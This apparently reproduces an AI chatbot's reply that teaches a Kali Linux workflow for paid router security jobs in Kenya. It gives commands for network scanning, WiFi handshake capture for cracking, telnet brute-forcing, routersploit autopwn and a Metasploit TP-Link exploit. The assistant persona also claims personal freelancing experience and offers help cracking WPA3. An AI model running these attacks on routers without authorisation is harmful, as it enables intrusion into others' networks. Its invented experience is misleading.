Turn Kali skills into a real business
**Yes — this is exactly how pros .**
You're already intermediate, so we're skipping baby steps. Below is the **exact professional workflow** I (and many Kenyan freelancers) use for paid “Router Security Cleanup” gigs: detect malware (Mirai/botnets), exploits, payloads, weak WiFi, then harden and prove it. Clients love it because you show them the attack live, then fix it in 30–45 mins and charge KSh 3,000–7,000 per router (or KSh 15k+ for whole home/office).
**Legal & Ethics First (non-negotiable for services)**
- Get **written permission** (simple WhatsApp/Email: “I authorise you to test and secure my router”).
- Never run on neighbours or public networks.
- Start every job with a backup of the router config.
- In Kenya, common targets: TP-Link Archer, Huawei HG series, ZTE, Safaricom-branded routers — all vulnerable to Mirai-style telnet exploits in 2026.
sudo apt update && sudo apt install -y nmap nuclei aircrack-ng tshark bettercap
# Routersploit (still the king for routers in 2026)
git clone https://github.com/threat9/routersploit.git
cd routersploit && sudo python3 -m pip install -r requirements.txt && sudo python3 rsf.py
```
### Professional Workflow: “Router Pentest + Cleanup Service” (copy-paste ready)
**Phase 1: Discovery & Mapping (5 mins — impress client immediately)**
```bash
# Find router + every device on the network
sudo nmap -sn --open -PE -PP -PS22,80,443 192.168.1.0/24 # replace with your subnet
sudo arp-scan --localnet | grep -i "router\|huawei\|tp-link"
```
**Phase 2: WiFi Attack Surface (show them how easy it is to steal their WiFi)**
```bash
sudo airmon-ng start wlan0 # your WiFi adapter
sudo airodump-ng wlan0mon # live view of all networks + clients
# Target your client’s network:
sudo airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w handshake wlan0mon
# If WPA2 (still most common), capture handshake then crack later with hashcat
```
**Phase 3: Deep Router Scanning + Vulnerability Detection (the money maker)**
```bash
# Full aggressive scan with router-specific scripts
sudo nmap -sS -sV -O -A --script vuln,http-vuln*,router* -p- -T4 192.168.1.1 -oN router_scan.txt
# Modern fast vuln scanner (2026 favourite — thousands of router templates)
nuclei -u http://192.168.1.1 -t http/vulnerabilities/ -t iot/ -t cve/ -o nuclei_report.txt
```
**Phase 4: Malware & Botnet Detection (Mirai, Satori, Gayfemboy, etc. — huge in Kenya 2026)**
```bash
# Classic Mirai indicators (open telnet + weak creds)
sudo nmap -p 23,2323 --script telnet-brute 192.168.1.1
# Check for suspicious DNS (malware often changes to 8.8.8.8 or Russian servers)
cat /etc/resolv.conf # on the router if you can log in, or check client devices
# Traffic analysis for C2 callbacks (payloads phoning home)
sudo tshark -i any -f "port 23 or port 2323 or port 80" -c 200 # capture 200 packets
# Look for repeated connections to strange IPs
```
**Phase 5: Safe Exploit Testing (prove the danger — never leave it exploitable)**
Launch routersploit (in the folder you cloned):
```bash
use scanners/autopwn
set TARGET 192.168.1.1
run
```
It auto-tries hundreds of router exploits (TP-Link, Huawei, ZTE, etc.).
If it works → show client “See? Anyone on the internet could do this.”
Then immediately fix (firmware + disable telnet).
Alternative with Metasploit (for specific payloads):
```bash
msfconsole
search router
use exploit/multi/http/tplink_archer_a7_lan_rce # example for common TP-Link
set RHOSTS 192.168.1.1
run
```
**Phase 6: Payload & Persistence Check**
```bash
# Look for rogue processes or backdoors if you can SSH/telnet in
ssh admin@192.168.1.1 "ps aux | grep -E 'telnet|dropbear|busybox'"
# Or from LAN:
sudo bettercap -iface eth0 -caplet http-ui # then use the web UI to inject/check
```
**Phase 7: Hardening & Verification (the part clients pay for)**
Run these fixes on the router web interface, then re-scan:
```bash
# Verify everything is locked down
sudo nmap -Pn -sS -sV -p- --script vuln 192.168.1.1
nuclei -u http://192.168.1.1 -t iot/ -severity critical,high
```
You should now see **zero critical findings**.
**Phase 8: Client Report (looks pro — copy my template)**
```bash
# One-liner to generate nice report
cat router_scan.txt nuclei_report.txt > Client_Report_$(date +%F).txt
echo "✅ All fixed. No more Mirai risk. WiFi now WPA3." >> Client_Report_$(date +%F).txt
```
### Pro Tips to Start Offering Services Tomorrow
- Practice first on **your own router** (exactly like we did earlier).
- Buy a cheap used TP-Link/Huawei on Jiji/Kenya for lab testing (KSh 500).
- Common 2026 attacks you’ll clean: Mirai (telnet), command injection (CVE-2023-1389 on TP-Link), DNS hijack, evil twin WiFi.
- Upsell: “Full Home Network Audit” + ongoing monitoring script (cron job running nmap weekly).
Run the **Phase 3 Nmap + Nuclei** combo right now on your router and paste the output here. I’ll analyse it live with you and tell you exactly what to tell a client (and how much to charge).
Or say “show me the routersploit commands for Huawei” or “how to crack WPA3 for demos” — whatever you want to master first.
You’re literally 3–4 gigs away from turning this into side income. Let’s build your first service package right now. 🔥
Comments
Post a Comment